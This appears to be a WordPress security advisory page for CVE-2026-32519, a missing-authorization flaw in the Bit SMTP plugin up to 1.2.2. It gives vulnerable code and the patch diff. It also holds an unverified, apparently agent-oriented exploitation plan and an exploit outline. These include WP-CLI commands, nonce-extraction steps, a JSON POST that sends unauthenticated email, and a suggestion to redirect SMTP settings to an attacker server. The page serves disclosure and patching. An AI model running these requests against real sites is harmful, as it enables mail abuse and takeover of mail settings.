WP-Safety
CVE-2026-32519

Bit SMTP – Easy SMTP Solution with Email Logs <= 1.2.2 - Missing Authorization

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
1.2.3
Patched in
8d
Time to patch

Description

The Bit SMTP – Easy SMTP Solution with Email Logs plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.2.2. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.2.2
PublishedMarch 20, 2026
Last updatedMarch 27, 2026
Affected pluginbit-smtp

What Changed in the Fix

Changes introduced in v1.2.3

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v1.2.2
Browse source Download .zip
Patched v1.2.3
Browse source Download .zip
Research Plan
Unverified

# Research Plan: CVE-2026-32519 - Bit SMTP Missing Authorization ## 1. Vulnerability Summary The **Bit SMTP** plugin for WordPress (versions <= 1.2.2) is vulnerable to **Missing Authorization**. This occurs because the plugin registers REST API endpoints (or AJAX handlers) meant for administrative …

Show full research plan

Research Plan: CVE-2026-32519 - Bit SMTP Missing Authorization

1. Vulnerability Summary

The Bit SMTP plugin for WordPress (versions <= 1.2.2) is vulnerable to Missing Authorization. This occurs because the plugin registers REST API endpoints (or AJAX handlers) meant for administrative tasks (like sending test emails or updating SMTP configurations) but fails to implement a permission_callback that verifies the user has the manage_options capability. Consequently, an unauthenticated attacker can trigger these functions remotely.

Given the plugin's architecture (using React, Ant Design, and TanStack Query as seen in the provided assets), the backend logic is primarily handled via the WordPress REST API.

2. Attack Vector Analysis

  • Endpoint: REST API route (Inferred: /wp-json/bit-smtp/v1/test-email or /wp-json/bit-smtp/v1/send-test-email).
  • Method: POST
  • Authentication: None (Unauthenticated).
  • Preconditions: The plugin must be active. If the endpoint requires a REST nonce, it must be obtainable from the frontend.
  • Payload: JSON object containing SMTP test parameters or target email addresses.

3. Code Flow (Inferred)

  1. Registration: The plugin uses the rest_api_init hook to register routes.
  2. Vulnerable Route: A route (e.g., bit-smtp/v1/test-email) is registered.
  3. Missing Check: The register_rest_route call either:
    • Omits the permission_callback argument entirely.
    • Sets permission_callback to __return_true.
    • Only checks for a valid nonce but does not verify user capabilities (current_user_can('manage_options')).
  4. Execution: The callback function (likely in a ConfigController or SmtpController) executes administrative logic (sending an email) for any requester.

4. Nonce Acquisition Strategy

While the vulnerability is "Missing Authorization," WordPress REST API routes often require a _wpnonce for the wp_rest action to prevent CSRF.

  1. Identify Localization: Bit Apps plugins typically localize variables into a global JS object. Based on common patterns for this developer, look for bitSmtpVars or bitsmtp_vars.
  2. Create Trigger Page: The plugin's scripts (and nonces) are usually loaded on the plugin's admin page. However, we need a way to get it unauthenticated. Check if the plugin enqueues scripts on the frontend (e.g., via a shortcode).
    • Check for shortcodes: wp eval "print_r( $GLOBALS['shortcode_tags'] );"
    • If a shortcode like [bit-smtp] or [bit_smtp] exists, create a page:
      wp post create --post_type=page --post_status=publish --post_content='[bit-smtp]'
  3. Extract Nonce:
    • Navigate to the created page or the homepage.
    • Use browser_eval to find the nonce:
      window.bitSmtpVars?.nonce || window.bitsmtp_ajax?.nonce
  4. Alternative (Common for Bit Apps): If the plugin is purely for admin use, the nonce might not be on the frontend. In that case, check if the endpoint is accessible without a nonce (some GET routes or improperly configured POST routes allow this).

5. Exploitation Strategy

The goal is to trigger the unauthorized sending of a test email, demonstrating the ability to use the server's mail-sending capabilities.

Step 1: Discover the Exact Route
Run the following to find the bit-smtp routes and their required permissions:

wp eval 'foreach( $GLOBALS["wp_rest_server"]->get_routes("bit-smtp/v1") as $path => $data ) { echo "Path: $path\n"; print_r($data[0]["permission_callback"]); }'

Step 2: Prepare the Payload
Assuming the route is /wp-json/bit-smtp/v1/send-test-email, the payload usually requires:

  • to: An email address under your control.
  • subject: "CVE-2026-32519 PoC"
  • message: "Exploit Successful"

Step 3: Send the Request
Using the http_request tool:

{
  "method": "POST",
  "url": "http://localhost:8080/wp-json/bit-smtp/v1/send-test-email",
  "headers": {
    "Content-Type": "application/json",
    "X-WP-Nonce": "EXTRACTED_NONCE_OR_OMIT"
  },
  "data": {
    "to": "attacker@example.com",
    "subject": "Unauthorized Test Email",
    "body": "This email was sent via an unauthenticated REST API call."
  }
}

6. Test Data Setup

  1. Install Plugin: wp plugin install bit-smtp --version=1.2.2 --activate
  2. Configure SMTP (Optional): If the plugin requires configuration before sending, use WP-CLI to set dummy options:
    wp option update bit_smtp_options '{"host":"localhost","port":"25","user":"","pass":"","type":"smtp"}' (Note: exact option name may vary; check wp option list | grep smtp).
  3. Public Page: Create a page to check for leaked nonces if necessary.

7. Expected Results

  • HTTP Response: 200 OK or 201 Created.
  • Body: A JSON response indicating success, e.g., {"success": true, "data": "Email sent successfully"}.
  • Action: The WordPress instance attempts to send an email (can be verified via logs).

8. Verification Steps

  1. Check Mail Logs: If a mail logging plugin is installed (or the Bit SMTP internal logs are used), check for the unauthorized email:
    wp eval "global $wpdb; print_r( $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}bit_smtp_logs ORDER BY id DESC LIMIT 1\") );"
  2. Verify Capability Failure: Try the same request on a patched version (1.2.3) and confirm it returns 401 Unauthorized or 403 Forbidden.

9. Alternative Approaches

If the send-test-email endpoint is not vulnerable, try:

  • Log Access: /wp-json/bit-smtp/v1/get-logs (Information Disclosure).
  • Settings Update: /wp-json/bit-smtp/v1/update-config (Integrity breach).
    • Payload: Change the from_email or SMTP credentials to an attacker-controlled server.
  • Check AJAX: If REST routes are properly protected, search for wp_ajax_nopriv_bit_smtp actions in the source code using grep -r "wp_ajax_nopriv".
Research Findings
Static analysis — not yet PoC-verified

Summary

The Bit SMTP plugin for WordPress is vulnerable to unauthorized access because it fails to apply authorization middleware to its REST API routes in versions up to 1.2.2. This allows unauthenticated attackers to perform administrative actions such as sending test emails, modifying SMTP configurations, and viewing email logs.

Vulnerable Code

/* backend/app/Providers/HookProvider.php */

if (isset($this->_pluginBackend)
    && RequestType::is(RequestType::API)
) {
    $router = new Router(RequestType::API, Config::SLUG, 'v' . Config::API_VERSION);

    include $this->_pluginBackend . 'hooks' . DIRECTORY_SEPARATOR . 'api.php';
    $router->register();
}

---

/* backend/hooks/api.php */

Route::group(function () {
    Route::post('mail/config/save', [SMTPController::class, 'saveMailConfig']);
    Route::get('mail/config/get', [SMTPController::class, 'index']);
    Route::post('mail/test/email', [SMTPController::class, 'sendTestEmail']);
    Route::get('mail/logs', [LogController::class, 'index']);
    Route::post('mail/logs/delete', [LogController::class, 'destroy']);
    Route::post('telemetry/save', [TelemetryPopupController::class, 'saveTelemetry']);
});

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/bit-smtp/1.2.2/backend/app/HTTP/Middleware/NonceCheckerMiddleware.php /home/deploy/wp-safety.org/data/plugin-versions/bit-smtp/1.2.3/backend/app/HTTP/Middleware/NonceCheckerMiddleware.php
--- /home/deploy/wp-safety.org/data/plugin-versions/bit-smtp/1.2.2/backend/app/HTTP/Middleware/NonceCheckerMiddleware.php	2025-11-08 13:27:56.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/bit-smtp/1.2.3/backend/app/HTTP/Middleware/NonceCheckerMiddleware.php	2026-02-20 10:00:30.000000000 +0000
@@ -11,10 +10,6 @@
 {
     public function handle(Request $request, ...$params)
     {
-        if (!$request->has('_ajax_nonce') || !wp_verify_nonce(sanitize_key($request->_ajax_nonce), Config::VAR_PREFIX . 'nonce')) {
-            return Response::error('Invalid token')->httpStatus(411);
-        }
-
         if (!Capabilities::check('manage_options')) {
             return Response::error([])->message('unauthorized access');
         }
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/bit-smtp/1.2.2/backend/app/Providers/HookProvider.php /home/deploy/wp-safety.org/data/plugin-versions/bit-smtp/1.2.3/backend/app/Providers/HookProvider.php
--- /home/deploy/wp-safety.org/data/plugin-versions/bit-smtp/1.2.2/backend/app/Providers/HookProvider.php	2025-11-08 13:27:56.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/bit-smtp/1.2.3/backend/app/Providers/HookProvider.php	2026-02-20 10:00:30.000000000 +0000
@@ -32,6 +32,7 @@
             && RequestType::is(RequestType::API)
         ) {
             $router = new Router(RequestType::API, Config::SLUG, 'v' . Config::API_VERSION);
+            $router->setMiddlewares(Plugin::instance()->middlewares());
 
             include $this->_pluginBackend . 'hooks' . DIRECTORY_SEPARATOR . 'api.php';
             $router->register();

Exploit Outline

An unauthenticated attacker can exploit this vulnerability by directly making requests to the plugin's REST API endpoints. 1. Identify the site's REST API base URL (typically `/wp-json/bit-smtp/v1/`). 2. To send an unauthorized email, send a POST request to `/wp-json/bit-smtp/v1/mail/test/email` with a JSON payload containing the target 'to' address, 'subject', and 'message'. 3. Because the vulnerable versions (<= 1.2.2) fail to attach the `NonceCheckerMiddleware` to the API router, the request will process without verifying a nonce or checking if the user has `manage_options` capabilities, resulting in the plugin executing the administrative action.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/9da38075-2268-4f98-b02c-0c7c34e16d85?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database